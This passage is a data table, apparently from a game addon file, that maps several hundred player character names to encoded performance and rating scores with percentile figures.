["Escapeqt"] = "ST:860/99%SB:863/99%AM:1130/100%",
["Rompwomp"] = "LT:788/98%LB:782/98%SM:1077/99%",
["Neco"] = "LT:791/98%SB:811/99%SM:1003/99%",
["Kinetikk"] = "LT:777/98%SB:795/99%EM:879/90%",
["Bronzino"] = "ST:839/99%SB:822/99%SM:1040/99%",
["Sleaze"] = "LT:755/96%LB:782/98%LM:835/97%",
["Dime"] = "ST:807/99%SB:853/99%SM:1109/99%",
["Conini"] = "ST:800/99%SB:786/99%LM:960/98%",
["Cixelsyd"] = "LT:754/96%SB:808/99%LM:956/97%",
["Purs"] = "LT:784/98%SB:786/99%LM:979/98%",
["Xoff"] = "LT:751/96%LB:788/98%EM:904/94%",
["Krubby"] = "LT:745/95%SB:804/99%LM:938/95%",
["Prometheusxd"] = "ST:794/99%LB:770/97%EM:888/91%",
["Frexis"] = "ST:705/99%LB:777/97%LM:964/97%",
["Bobokhan"] = "ST:677/99%SB:801/99%SM:930/99%",
["Shànks"] = "LT:788/98%SB:819/99%SM:955/99%",
["Shakazalabas"] = "ET:697/92%SB:753/99%LM:940/96%",
["Moordenaar"] = "LT:513/97%LB:769/97%EM:899/92%",
["Relaxin"] = "LT:775/98%SB:831/99%SM:1007/99%",
["Cardrina"] = "LT:786/98%SB:806/99%EM:927/94%",
["Realmxv"] = "ET:585/78%SB:804/99%SM:1020/99%",
["Iolqq"] = "ET:705/92%SB:813/99%SM:1023/99%",
["Pasia"] = "LT:782/98%SB:809/99%SM:1022/99%",
["Uhlrick"] = "LT:776/98%SB:795/99%LM:950/96%",
["Hydrostatic"] = "LB:794/98%LM:959/97%",
["Fronga"] = "RT:431/61%LB:778/98%LM:975/98%",
["Smokex"] = "ET:690/89%SB:799/99%EM:862/88%",
["Heilwolf"] = "LT:777/97%SB:813/99%EM:931/94%",
["Freshyy"] = "LT:775/98%SB:811/99%SM:1003/99%",
["Arcanine"] = "ST:851/99%SB:815/99%EM:920/94%",
["Dustier"] = "ST:795/99%SB:826/99%SM:1033/99%",
["Rasty"] = "ST:824/99%SB:855/99%SM:1066/99%",
["Loc"] = "LT:584/98%SB:752/99%EM:910/93%",
["Faca"] = "ST:813/99%LB:792/98%SM:1056/99%",
["Adelante"] = "ST:684/99%LB:790/98%LM:930/96%",
["Clockzy"] = "LT:777/97%SB:816/99%LM:960/97%",
["Underbite"] = "LT:634/98%LB:787/98%SM:1014/99%",
["Chillku"] = "ST:893/99%SB:785/99%EM:676/78%",
["Mikùwú"] = "LT:867/98%SB:813/99%SM:1020/99%",
["Pizzalicious"] = "ET:754/91%SB:777/99%SM:1003/99%",
["Nabu"] = "LT:865/98%SB:803/99%SM:995/99%",
["Balthemain"] = "LT:680/98%LB:764/98%LM:943/96%",
["Caledhel"] = "LT:872/98%SB:802/99%SM:987/99%",
["Empty"] = "ET:755/92%SB:788/99%SM:1040/99%",
["Mokthul"] = "LT:857/98%LB:779/98%SM:1000/99%",
["Terrorbub"] = "LT:827/96%SB:797/99%LM:957/97%",
["Icekeyboard"] = "ST:878/99%SB:799/99%SM:937/99%",
["Poaf"] = "ET:431/92%LB:753/98%LM:929/96%",
["Phara"] = "LT:873/98%SB:803/99%SM:997/99%",
["Spottieottie"] = "ST:695/99%SB:792/99%LM:976/98%",
["Misol"] = "ET:685/85%LB:759/98%LM:929/97%",
["Ikutani"] = "ST:915/99%SB:849/99%SM:1022/99%",
["Lecarpetron"] = "LT:839/97%SB:824/99%LM:981/98%",
["Tialary"] = "ST:856/99%LB:774/98%SM:983/99%",
["Huntervner"] = "ST:734/99%LB:778/98%LM:971/98%",
["Lurgarl"] = "LT:658/98%LB:733/97%LM:951/98%",
["Misayamikoto"] = "ST:905/99%SB:802/99%EM:866/93%",
["Rows"] = "LT:806/95%LB:748/97%EM:692/80%",
["Rascalsm"] = "ST:812/99%SB:787/99%LM:955/98%",
["Ratlord"] = "LT:859/98%SB:729/99%SM:1009/99%",
["Drage"] = "RT:501/66%LB:755/97%EM:889/92%",
["Priesting"] = "ET:672/85%LB:590/96%EM:787/89%",
["Shiiet"] = "LT:839/97%SB:842/99%SM:1025/99%",
["Kataclasm"] = "LT:827/96%LB:690/98%LM:927/97%",
["Skew"] = "ET:755/92%LB:766/98%LM:783/97%",
["Served"] = "LT:847/97%SB:781/99%SM:1003/99%",
["Kozkon"] = "LT:820/96%SB:753/99%LM:814/97%",
["Reborn"] = "LT:855/98%SB:778/99%SM:1040/99%",
["Getweird"] = "LT:602/97%LB:774/98%LM:966/98%",
["Shãmántics"] = "LT:701/98%LB:702/98%LM:966/98%",
["Lancevance"] = "LT:878/98%LB:764/98%SM:994/99%",
["Gerrydruid"] = "ST:723/99%SB:800/99%SM:940/99%",
["Topseer"] = "LT:860/98%SB:760/99%SM:980/99%",
["Kekeke"] = "ST:907/99%SB:805/99%LM:860/98%",
["Gbpusd"] = "LT:871/98%LB:771/98%LM:959/97%",
["Elementz"] = "LT:683/98%SB:802/99%SM:998/99%",
["Yossariot"] = "LT:832/97%LB:726/96%LM:769/96%",
["Sprankles"] = "LB:756/98%LM:968/98%",
["Hexo"] = "ET:421/90%SB:832/99%SM:984/99%",
["Mooe"] = "LT:822/96%LB:771/98%LM:970/98%",
["Chiangmai"] = "UT:362/47%SB:819/99%LM:973/98%",
["Darksmoke"] = "LT:629/98%SB:706/99%LM:898/95%",
["Valaddiction"] = "RT:514/66%LB:730/96%LM:972/98%",
["Bloobzoob"] = "LT:801/95%SB:689/99%LM:973/98%",
["Elemaster"] = "LT:843/97%LB:776/98%LM:929/97%",
["Wizonetw"] = "ET:734/90%LB:658/98%LM:920/97%",
["Parol"] = "LT:806/95%LB:749/98%LM:929/97%",
["Narni"] = "LT:822/96%SB:838/99%LM:972/98%",
["Shifthâppens"] = "UT:197/26%SB:803/99%LM:976/98%",
["Nothingworth"] = "LT:630/98%SB:770/99%LM:908/95%",
["Goopuschrist"] = "LT:852/98%LB:750/98%LM:923/97%",
["Highonacid"] = "RT:249/70%EB:697/94%EM:887/94%",
["Zaggin"] = "ST:891/99%SB:817/99%SM:958/99%",
["Rocknrøll"] = "ST:748/99%LB:757/98%SM:1004/99%",
["Holypal"] = "ET:784/94%SB:775/99%SM:907/99%",
["Supersoba"] = "ET:741/91%SB:798/99%EM:789/87%",
["Derpshine"] = "LT:877/98%SB:790/99%SM:986/99%",
["Zura"] = "ST:876/99%SB:803/99%SM:997/99%",
["Valkikoman"] = "LT:829/96%LB:742/96%LM:946/98%",
["Valkyri"] = "ET:750/91%EB:680/93%LM:915/96%",
["Chyeedigs"] = "ST:915/99%SB:861/99%SM:986/99%",
["Gooioop"] = "LT:872/98%SB:844/99%SM:1069/99%",
["Zoor"] = "ET:467/93%LB:771/98%EM:915/94%",
["Greedd"] = "LT:831/96%SB:751/99%LM:940/96%",
["Kreamins"] = "LT:860/98%SB:770/99%LM:970/98%",
["Saharie"] = "LT:853/98%SB:800/99%LM:970/98%",
["Cousinlarry"] = "LT:865/98%SB:786/99%LM:952/98%",
["Munkk"] = "LT:864/98%SB:758/99%EM:903/94%",
["Emp"] = "LT:857/98%SB:785/99%LM:796/97%",
["Tengoo"] = "LT:858/98%SB:774/99%LM:921/97%",
["Jeffaroo"] = "LT:855/98%SB:775/99%SM:979/99%",
["Hedrack"] = "ET:779/93%LB:765/98%EM:486/82%",
["Holyshmoly"] = "LT:871/98%SB:775/99%LM:950/98%",
["Pomsdruid"] = "ST:915/99%LB:759/98%LM:966/98%",
["Criticalbarb"] = "ST:772/99%SB:757/99%LM:977/98%",
["Destain"] = "ST:817/99%LB:770/97%LM:985/98%",
["Jakex"] = "ST:831/99%SB:867/99%SM:1043/99%",
["Gamer"] = "ST:881/99%SB:811/99%SM:1132/99%",
["Ozarka"] = "LT:771/97%SB:801/99%SM:928/99%",
["Poonhaarpoon"] = "ST:787/99%LB:756/95%EM:912/93%",
["Thillz"] = "LT:785/98%LB:778/97%EM:808/84%",
["Skaterdad"] = "ST:915/99%SB:927/99%SM:1191/99%",
["Fmsxwarr"] = "ST:856/99%LB:785/98%LM:679/96%",
["Leonen"] = "LT:767/97%LB:767/96%EM:906/93%",
["Shadowized"] = "ST:833/99%SB:814/99%SM:1009/99%",
["Spat"] = "ST:807/99%LB:766/96%EM:862/89%",
["Jiinx"] = "ST:800/99%SB:774/99%LM:935/96%",
["Gbhooper"] = "LT:765/97%LB:725/98%EM:737/94%",
["Oldmanraw"] = "ST:812/99%SB:799/99%SM:916/99%",
["Pekowarrior"] = "LT:751/95%LB:792/98%LM:979/97%",
["Ankhar"] = "ST:869/99%SB:818/99%LM:967/97%",
["Bolkie"] = "ST:877/99%SB:880/99%SM:1116/99%",
["Sabroso"] = "LT:785/98%LB:667/96%LM:954/97%",
["Gashil"] = "ST:857/99%SB:813/99%SM:1102/99%",
["Pwniez"] = "ST:848/99%SB:866/99%SM:999/99%",
["Remle"] = "LT:792/98%LB:782/98%LM:957/96%",
["Akei"] = "ST:837/99%EB:743/93%LM:978/97%",
["Jûggernaût"] = "LT:779/98%LB:714/98%LM:988/98%",
["Comet"] = "ST:810/99%SB:803/99%LM:978/98%",
["Cursedtoo"] = "LT:771/97%LB:741/98%LM:953/96%",
["Araltus"] = "ST:826/99%SB:809/99%SM:1026/99%",
["Bucketman"] = "LT:772/97%SB:801/99%LM:973/98%",
["Nyon"] = "ST:834/99%SB:827/99%SM:1020/99%",
["Vajeen"] = "LT:787/98%LB:774/97%EM:881/91%",
["Slappyy"] = "ST:812/99%LB:782/98%LM:988/98%",
["Magdelin"] = "ST:815/99%SB:875/99%SM:1069/99%",
["Balderic"] = "LT:775/97%SB:800/99%LM:971/97%",
["Sarthe"] = "ST:875/99%SB:801/99%SM:1025/99%",
["Thotiana"] = "ST:829/99%SB:809/99%SM:1015/99%",
["Dorghu"] = "ST:821/99%SB:819/99%LM:953/96%",
["Kelodine"] = "LT:771/97%LB:787/98%LM:901/98%",
["Anorra"] = "LT:765/97%LB:746/98%LM:949/96%",
["Cadillac"] = "ST:851/99%SB:900/99%SM:1052/99%",
["Dodge"] = "ST:803/99%SB:802/99%LM:985/98%",
["Quickest"] = "ST:831/99%LB:795/98%LM:944/95%",
["Walah"] = "LT:789/98%LB:779/97%LM:849/97%",
["Fraktion"] = "ST:821/99%LB:796/98%EM:865/89%",
["Praisegaben"] = "ST:798/99%SB:800/99%LM:873/98%",
["Snomie"] = "ST:797/99%SB:822/99%LM:973/97%",
["Emotìons"] = "LT:761/96%SB:798/99%LM:952/96%",
["Intrigue"] = "ST:802/99%SB:801/99%SM:1093/99%",
["Xaxen"] = "ST:825/99%SB:832/99%SM:1020/99%",
["Maryswanson"] = "ST:809/99%SB:808/99%SM:988/99%",
["Moped"] = "LT:793/98%SB:766/99%LM:982/98%",
["Nicoo"] = "ST:729/99%LB:788/98%EM:935/93%",
["Baldfemorc"] = "LT:777/98%LB:771/97%LM:868/98%",
["Mariusmcduff"] = "ST:827/99%SB:796/99%LM:977/98%",
["Sevatar"] = "ST:813/99%LB:795/98%LM:963/97%",
["Gbutoheaven"] = "LT:773/97%LB:781/98%EM:913/93%",
["Hooked"] = "LT:791/98%SB:799/99%LM:951/96%",
["Galandil"] = "ST:812/99%SB:811/99%SM:1040/99%",
["Screener"] = "ST:845/99%SB:827/99%SM:1040/99%",
["Djrezn"] = "LT:780/98%LB:772/97%SM:962/99%",
["Thilindor"] = "LT:769/97%LB:759/95%EM:922/94%",
["Tankspank"] = "LT:768/97%LB:776/97%SM:1036/99%",
["Roopert"] = "ST:880/99%SB:809/99%SM:1014/99%",
["Jarovi"] = "LT:781/98%SB:822/99%SM:910/99%",
["Toughclass"] = "ST:821/99%SB:840/99%SM:1013/99%",
["Jaymochi"] = "LT:791/98%SB:794/99%LM:951/96%",
["Poohskyy"] = "ST:832/99%SB:800/99%SM:1020/99%",
["Anyn"] = "LT:812/96%SB:699/99%EM:899/94%",
["Proud"] = "LT:866/98%SB:691/99%LM:941/97%",
["Crug"] = "ST:879/99%LB:771/98%LM:970/98%",
["Iona"] = "ST:920/99%LB:777/98%SM:1023/99%",
["Enjoi"] = "LT:805/95%EB:656/91%EM:842/90%",
["Averwind"] = "ST:949/99%SB:814/99%LM:947/97%",
["Chrixx"] = "ST:877/99%LB:760/98%LM:925/96%",
["Books"] = "LT:844/97%LB:734/97%EM:776/87%",
["Thewobbit"] = "LT:769/98%SB:826/99%SM:980/99%",
["Wreckdum"] = "ST:890/99%LB:636/97%SM:982/99%",
["Yodamcfoda"] = "LT:856/98%LB:749/98%LM:955/98%",
["Fabi"] = "LT:795/95%SB:738/99%SM:985/99%",
["Benediction"] = "LT:683/98%SB:773/99%LM:864/98%",
["Stankers"] = "ST:878/99%LB:748/97%LM:948/97%",
["Goobop"] = "LT:829/97%LB:749/98%SM:1035/99%",
["Elliee"] = "LT:833/97%LB:764/98%SM:1008/99%",
["Neonmonkey"] = "LT:873/98%LB:766/98%SM:981/99%",
["Lonnylasagna"] = "LT:845/97%LB:760/98%LM:915/96%",
["Mellow"] = "LT:839/97%SB:776/99%SM:978/99%",
["Armwrestle"] = "LT:829/97%LB:756/98%LM:967/98%",
["Healzu"] = "LT:812/96%EB:699/94%LM:927/96%",
["Onepunch"] = "ST:878/99%SB:837/99%SM:1015/99%",
["Poofnobuffs"] = "LT:844/97%LB:710/95%EM:780/88%",
["Blünts"] = "LT:854/98%SB:800/99%LM:925/96%",
["Riekan"] = "LT:864/98%SB:780/99%LM:954/98%",
["Milkersz"] = "LT:811/95%EB:699/94%LM:938/97%",
["Monotheist"] = "ST:905/99%SB:785/99%SM:1033/99%",
["Nystik"] = "LT:803/95%EB:620/87%EM:830/89%",
["Matchings"] = "ST:902/99%SB:789/99%LM:958/98%",
["Sauced"] = "LT:510/95%EB:681/92%EM:889/94%",
["Rickrick"] = "LT:837/98%LB:632/98%SM:965/99%",
["Balloon"] = "LT:843/97%SB:778/99%SM:1006/99%",
["Nightfork"] = "LT:812/95%SB:680/99%EM:867/92%",
["Hotzlol"] = "ST:883/99%SB:810/99%LM:941/97%",
["Celesdea"] = "ST:896/99%SB:792/99%LM:969/98%",
["Sho"] = "ET:764/92%LB:608/97%EM:755/87%",
["Shadowyzed"] = "LT:833/97%LB:724/96%LM:929/97%",
["Sylador"] = "ST:945/99%SB:822/99%SM:1004/99%",
["Roshipally"] = "LT:797/95%SB:791/99%SM:977/99%",
["Crowwvvwwvvw"] = "LT:624/98%LB:719/96%LM:944/98%",
["Riots"] = "ST:900/99%SB:781/99%SM:1016/99%",
["Leer"] = "LT:857/98%LB:737/97%LM:957/98%",
["Werstardust"] = "LT:801/95%LB:569/95%EM:684/75%",
["Iyqu"] = "ST:909/99%LB:763/98%LM:933/96%",
["Shoz"] = "ST:912/99%LB:763/98%LM:910/95%",
["Vuhldahr"] = "LT:815/96%LB:713/96%LM:919/96%",
["Kuts"] = "ST:902/99%LB:758/98%SM:881/99%",
["Gingabeard"] = "LT:828/96%LB:742/97%EM:895/94%",
["Orangehaze"] = "ST:890/99%LB:674/98%LM:938/97%",
["Stich"] = "LT:856/98%EB:655/90%EM:825/89%",
["Fontell"] = "ET:758/92%SB:764/99%SM:1034/99%",
["Titanicadin"] = "ST:905/99%SB:811/99%SM:1000/99%",
["Lucína"] = "LT:840/97%LB:600/97%EM:767/87%",
["Kaitlyn"] = "LT:830/97%LB:748/97%LM:955/98%",
["Strath"] = "LT:854/98%SB:763/99%SM:986/99%",
["Blathers"] = "ST:879/99%SB:784/99%LM:950/98%",
["Rosof"] = "LT:835/97%SB:767/99%EM:892/93%",
["Refractions"] = "ST:887/99%SB:814/99%SM:981/99%",
["Hearthas"] = "ST:882/99%SB:765/99%SM:1010/99%",
["Threetap"] = "ST:881/99%SB:807/99%LM:962/98%",
["Maker"] = "LT:858/98%LB:744/97%EM:864/91%",
["Zombie"] = "ST:729/99%LB:782/98%SM:983/99%",
["Dodgee"] = "LT:865/98%EB:680/91%EM:664/92%",
["Xiaoku"] = "ET:795/94%LB:723/96%EM:838/92%",
["Btsfan"] = "LT:821/96%LB:741/97%LM:944/98%",
["Zhenduo"] = "ST:904/99%SB:762/99%SM:1018/99%",
["Melandra"] = "ST:892/99%LB:760/97%LM:963/98%",
["Londuuz"] = "ST:896/99%LB:776/98%LM:851/98%",
["Silrani"] = "ST:800/99%SB:821/99%LM:967/97%",
["Thismistarx"] = "LT:789/98%SB:796/99%EM:914/93%",
["Gankbot"] = "ST:702/99%LB:792/98%LM:908/98%",
["Snarfy"] = "ST:804/99%SB:795/99%SM:975/99%",
["Bloodwaltz"] = "LT:789/98%SB:799/99%SM:1001/99%",
["Shrimptease"] = "ST:732/99%SB:828/99%SM:1026/99%",
["Berzerk"] = "LT:753/96%LB:778/97%LM:954/97%",
["Trillstep"] = "ST:822/99%SB:829/99%SM:1019/99%",
["Grammy"] = "LT:752/95%SB:805/99%LM:851/97%",
["Boz"] = "ST:743/99%SB:822/99%LM:973/98%",
["Ainge"] = "ST:818/99%SB:859/99%SM:1078/99%",
["Klaudio"] = "LT:762/96%SB:797/99%LM:982/98%",
["Minideli"] = "LT:489/96%LB:783/98%EM:906/93%",
["Parallel"] = "ST:802/99%SB:817/99%SM:1011/99%",
["Twizell"] = "LT:788/98%LB:775/97%EM:881/91%",
["Spacekadet"] = "LT:763/96%LB:785/98%EM:893/92%",
["Burntcow"] = "LB:780/97%EM:909/93%",
["Nyple"] = "ST:795/99%SB:807/99%LM:969/97%",
["Radium"] = "ET:378/93%LB:775/97%LM:962/97%",
["Veess"] = "ST:806/99%SB:824/99%EM:920/93%",
["Yubunam"] = "RT:430/68%LB:788/98%LM:946/96%",
["Thollis"] = "ST:770/99%SB:797/99%LM:956/96%",
["Hordemom"] = "LT:775/97%LB:793/98%EM:911/94%",
["Volitans"] = "ST:724/99%LB:784/98%LM:991/98%",
["Amused"] = "LT:761/96%LB:792/98%SM:987/99%",
["Dogwar"] = "ET:734/94%LB:781/98%LM:969/97%",
["Sacks"] = "ET:646/85%LB:761/96%EM:922/94%",
["Tireboy"] = "LT:778/98%SB:797/99%LM:995/98%",
["Mangumx"] = "ST:818/99%SB:808/99%LM:965/97%",
["Lu"] = "UT:219/28%SB:840/99%SM:1031/99%",
["Skyu"] = "LT:793/98%SB:801/99%LM:994/98%",
["Gobstopper"] = "LT:764/97%SB:805/99%LM:954/97%",
["Aserox"] = "LT:790/98%LB:791/98%SM:946/99%",
["Furiousmarty"] = "ET:610/81%LB:780/97%EM:909/93%",
["Tissue"] = "LT:751/95%SB:799/99%LM:962/97%",
["Galocks"] = "ET:583/78%LB:760/96%EM:915/93%",
["Answerz"] = "ST:806/99%SB:818/99%LM:994/98%",
["Droseros"] = "LT:773/97%SB:801/99%SM:1012/99%",
["Official"] = "ST:798/99%SB:804/99%SM:1005/99%",
["Bikpla"] = "LT:753/95%LB:779/98%LM:916/95%",
["Ventrilo"] = "ET:730/93%LB:766/96%EM:767/81%",
["Tactile"] = "LT:775/97%LB:773/97%LM:970/97%",
["Jonuh"] = "ST:811/99%SB:812/99%LM:948/97%",
["Fattybreath"] = "ET:391/93%SB:751/99%EM:752/94%",
["Skeetonyrgpa"] = "LT:783/98%LB:791/98%LM:949/97%",
["Breya"] = "ST:814/99%SB:797/99%LM:955/96%",
["Croakies"] = "ET:728/93%LB:776/97%LM:941/96%",
["Evilhomer"] = "LT:786/98%LB:784/98%LM:939/96%",
["Zale"] = "ST:793/99%LB:796/98%LM:994/98%",
["Stealthyboy"] = "ST:730/99%LB:790/98%LM:933/95%",
["Valid"] = "LT:750/95%LB:765/96%EM:920/94%",
["Grubby"] = "ST:819/99%SB:806/99%SM:999/99%",
["Has"] = "LT:787/98%LB:794/98%SM:1054/99%",
["Swagstabbin"] = "LT:786/98%LB:789/98%EM:915/94%",
["Whatissap"] = "LT:782/98%SB:782/99%LM:984/98%",
["Ainger"] = "LT:793/98%SB:816/99%SM:1005/99%",
["Kiliok"] = "ET:728/93%LB:733/98%LM:984/98%",
["Bibitong"] = "ST:802/99%SB:830/99%LM:980/98%",
["Jeff"] = "LT:788/98%SB:817/99%LM:984/98%",
["Apolyon"] = "ET:739/94%LB:776/97%EM:879/92%",
["Geschenk"] = "LT:773/97%SB:832/99%LM:894/98%",
["Gnomërcy"] = "LT:780/98%SB:806/99%LM:960/97%",
["Doknut"] = "LT:774/97%LB:687/97%LM:946/96%",
["Beasters"] = "LT:780/98%SB:815/99%SM:1015/99%",
["Swordspls"] = "LT:758/96%LB:793/98%EM:922/94%",
["Johansson"] = "LT:772/97%LB:781/97%LM:993/98%",
["Tobes"] = "ST:691/99%SB:768/99%SM:996/99%",
["Doomed"] = "ST:793/99%LB:792/98%LM:993/98%",
["Huug"] = "ST:857/99%SB:735/99%EM:895/93%",
["Yuume"] = "RT:547/69%EB:655/90%EM:780/85%",
["Perkypriest"] = "ET:781/93%LB:655/98%LM:936/97%",
["Mirraa"] = "LT:827/96%SB:819/99%SM:1048/99%",
["Howzitbrah"] = "LT:825/96%SB:791/99%LM:975/98%",
["Dusti"] = "LT:812/96%SB:801/99%SM:1057/99%",
["Tohkay"] = "LT:529/96%SB:776/99%LM:795/97%",
["Thunderdoom"] = "ET:397/89%SB:725/99%LM:808/97%",
["Fancybunny"] = "LB:729/96%SM:996/99%",
["Sibs"] = "ST:737/99%SB:804/99%SM:1009/99%",
["Ryohlex"] = "ET:723/89%LB:750/98%LM:970/98%",
["Galazbradin"] = "ET:456/94%LB:763/98%EM:731/80%",
["Rshammy"] = "ET:757/91%SB:786/99%LM:940/97%",
["Superwuqin"] = "ET:708/87%EB:691/94%EM:815/88%",
["Utdaydar"] = "LT:868/98%SB:797/99%SM:1000/99%",
["Madamea"] = "LT:858/98%LB:752/98%LM:963/98%",
["Kimjongoom"] = "ET:787/94%SB:687/99%LM:926/96%",
["Thundersm"] = "ST:889/99%SB:722/99%LM:902/95%",
["Necrohealya"] = "RT:267/73%LB:735/97%LM:860/98%",
["Orangesauce"] = "ST:906/99%SB:811/99%SM:1007/99%",
["Ick"] = "LT:805/95%LB:780/98%LM:909/96%",
["Insomanic"] = "ST:769/99%LB:763/98%EM:884/93%",
["Nuttee"] = "LT:866/98%LB:770/98%SM:988/99%",
["Riotz"] = "LT:840/97%LB:717/95%EM:803/87%",
["Venii"] = "ET:294/80%LB:766/98%LM:940/97%",
["Pda"] = "ET:493/94%LB:765/97%LM:945/98%",
["Ecna"] = "LT:855/98%LB:755/97%LM:915/96%",
["Jülÿ"] = "ST:754/99%LB:738/96%EM:892/93%",
["Clorins"] = "LT:529/96%LB:742/97%SM:877/99%",
["Velyris"] = "ST:689/99%LB:755/98%SM:968/99%",
["Luvthebooty"] = "LT:590/97%SB:774/99%EM:899/94%",
["Hafman"] = "ST:799/99%SB:780/99%LM:960/98%",
["Muten"] = "LT:861/98%LB:767/98%LM:935/96%",
["Zulank"] = "ET:786/93%LB:756/97%LM:903/95%",
["Umidin"] = "LT:862/98%SB:790/99%SM:978/99%",
["Keegism"] = "LT:822/96%LB:776/98%SM:969/99%",
["Lilchub"] = "ET:784/94%SB:741/99%SM:976/99%",
["Waphlepriest"] = "LT:850/98%SB:775/99%EM:891/94%",
["Sythlord"] = "ET:709/87%LB:728/97%LM:916/97%",
["Hyolin"] = "ET:774/93%LB:769/98%LM:922/96%",
["Wampa"] = "LT:873/98%LB:753/97%LM:729/95%",
["Maodidi"] = "LT:816/96%LB:742/97%EM:846/91%",
["Thundurus"] = "LT:851/97%SB:721/99%LM:958/98%",
["Katelynstark"] = "ET:659/82%LB:707/95%LM:904/95%",
["Gut"] = "LT:837/97%SB:714/99%EM:837/90%",
["Shakashambas"] = "LT:532/96%SB:788/99%SM:991/99%",
["Linxx"] = "LT:873/98%SB:834/99%SM:1019/99%",
["Kdtree"] = "ET:780/94%LB:744/97%LM:922/96%",
["Shaggyshagg"] = "LT:867/98%LB:761/97%LM:945/98%",
["Zrakki"] = "LT:872/98%LB:773/98%SM:897/99%",
["Ltrain"] = "LT:797/95%SB:824/99%SM:1003/99%",
["Armer"] = "ET:742/90%LB:563/95%LM:948/98%",
["Shamanigains"] = "ET:463/93%LB:732/95%EM:891/93%",
["Fadedd"] = "ET:749/91%EB:644/90%LM:928/96%",
["Feardeath"] = "ET:642/80%EB:636/89%EM:829/92%",
["Strages"] = "LT:822/96%LB:738/97%EM:851/92%",
["Dragonfour"] = "ET:689/86%SB:796/99%SM:1008/99%",
["Lunaise"] = "ST:881/99%SB:790/99%SM:1002/99%",
["Tessai"] = "LT:822/96%LB:767/98%LM:950/97%",
["Stewie"] = "LT:827/96%LB:740/96%LM:817/97%",
["Galasong"] = "LB:638/98%EM:871/93%",
["Pastapasta"] = "LT:861/98%LB:778/98%SM:986/99%",
["Coybc"] = "LT:863/98%SB:818/99%SM:1006/99%",
["Leché"] = "ET:678/83%LB:726/95%EM:872/91%",
["Evilsloth"] = "ET:374/87%SB:797/99%SM:987/99%",
["Dispersion"] = "LT:814/96%LB:766/98%LM:912/95%",
["Kaguhime"] = "LT:875/98%SB:795/99%LM:891/95%",
["Permiscuous"] = "ET:770/93%LB:633/97%LM:939/97%",
["Immortallee"] = "LT:837/97%SB:801/99%SM:1009/99%",
["Rofel"] = "ET:759/92%LB:740/97%SM:978/99%",
["Paol"] = "LT:816/95%LB:605/96%EM:849/89%",
["Xanthos"] = "LT:813/96%LB:707/95%EM:873/93%",
["Tmillzpally"] = "LB:744/97%EM:859/93%",
["Murderkitten"] = "LT:866/98%LB:770/98%LM:969/98%",
["Deeb"] = "ET:337/83%LB:630/97%LM:726/95%",
["Paruk"] = "ST:796/99%SB:834/99%SM:1004/99%",
["Deap"] = "ST:921/99%SB:896/99%SM:1002/99%",
["Izola"] = "LT:774/97%SB:779/99%SM:1005/99%",
["Killyi"] = "LT:760/96%LB:767/96%EM:920/94%",
["Kaiokaze"] = "ST:811/99%SB:758/99%SM:1030/99%",
["Braves"] = "ST:998/99%SB:884/99%LM:962/98%",
["Carnasis"] = "ST:802/99%LB:752/95%SM:990/99%",
["Shizah"] = "ST:744/99%LB:791/98%SM:1021/99%",
["Poker"] = "ST:830/99%SB:842/99%SM:1038/99%",
["Easzy"] = "ST:806/99%SB:850/99%SM:1056/99%",
["Ggalpha"] = "LT:789/98%SB:803/99%LM:973/98%",
["Starfallen"] = "LT:785/98%LB:661/96%EM:943/94%",
["Milksteak"] = "ST:773/99%SB:809/99%EM:918/94%",
["Sherwood"] = "ST:815/99%SB:814/99%SM:1002/99%",
["Nobanplz"] = "ST:797/99%LB:777/97%EM:899/92%",
["Monalicha"] = "LT:780/98%SB:763/99%LM:945/96%",
["Main"] = "ST:813/99%SB:816/99%SM:1043/99%",
["Garonaa"] = "ST:798/99%LB:786/98%SM:1034/99%",
["Huanchaos"] = "ST:805/99%SB:803/99%LM:944/96%",
["Jaynah"] = "ST:808/99%SB:817/99%SM:1003/99%",
["Mooazrael"] = "LT:772/97%LB:709/97%EM:696/84%",
["Funpii"] = "LT:774/97%LB:789/98%EM:852/90%",
["Whipped"] = "ST:806/99%LB:755/95%LM:927/97%",
["Stepcousin"] = "ST:888/99%SB:853/99%SM:1127/99%",
["Flaws"] = "LT:792/98%SB:802/99%SM:1000/99%",
["Markooze"] = "ST:799/99%SB:853/99%SM:966/99%",
["Jeraxx"] = "LT:775/97%EB:517/88%RM:604/68%",
["Neurotoxic"] = "ST:787/99%SB:807/99%LM:986/98%",
["Cocomilk"] = "ST:804/99%SB:800/99%EM:889/91%",
["Meatsnack"] = "LT:776/98%EB:746/94%EM:811/86%",
["Emotionz"] = "ST:809/99%SB:796/99%LM:985/98%",
["Mantra"] = "LT:790/98%LB:783/98%LM:993/98%",
["Nocjr"] = "ST:796/99%SB:834/99%LM:977/98%",
["Krzdic"] = "ST:760/99%SB:841/99%SM:1004/99%",
["Bigdirtymike"] = "LT:783/98%LB:790/98%LM:910/98%",
["Chompe"] = "ET:738/94%LB:741/98%EM:900/94%",
["Taiwon"] = "ST:835/99%LB:798/98%LM:996/98%",
["Panthèro"] = "LT:760/96%LB:668/96%LM:851/97%",
["Mimik"] = "ST:824/99%SB:820/99%SM:1040/99%",
["Psykerx"] = "ST:823/99%SB:837/99%SM:1094/99%",
["Retainers"] = "LT:784/98%SB:848/99%LM:948/96%",
["Apogee"] = "ST:839/99%SB:871/99%SM:1094/99%",
["Shmings"] = "LT:766/97%SB:778/99%LM:804/96%",
["Atlasquake"] = "LT:749/95%LB:751/95%EM:750/94%",
["Oathbreaker"] = "LT:747/95%LB:777/97%LM:959/98%",
["Syv"] = "ST:836/99%SB:803/99%SM:995/99%",
["Jackedcat"] = "LT:780/98%LB:686/97%LM:944/96%",
["Montag"] = "ST:817/99%SB:780/99%LM:944/96%",
["Imaprot"] = "LT:764/97%LB:700/97%LM:964/98%",
["Lavitzi"] = "ST:804/99%SB:871/99%SM:1020/99%",
["Charlesjr"] = "ST:797/99%LB:779/98%LM:856/97%",
["Femalegamer"] = "LT:793/98%SB:810/99%SM:999/99%",
["Braavosi"] = "ST:797/99%SB:774/99%LM:973/98%",
["Srgscyther"] = "ST:806/99%LB:789/98%EM:880/90%",
["Unclephil"] = "ST:680/99%LB:772/97%LM:995/98%",
["Daquonda"] = "ST:834/99%SB:911/99%SM:1124/99%",
["Leshaunda"] = "LT:774/97%EB:587/93%RM:392/74%",
["Dijet"] = "LT:778/98%LB:725/98%LM:944/96%",
["Meatassdog"] = "ST:793/99%SB:823/99%LM:930/97%",
["Bonzia"] = "ET:421/94%EB:742/93%LM:976/98%",
["Corwynn"] = "LT:770/97%SB:799/99%LM:958/97%",
["Bestpie"] = "ST:772/99%EB:732/93%EM:830/87%",
["Invade"] = "ST:803/99%LB:792/98%LM:983/98%",
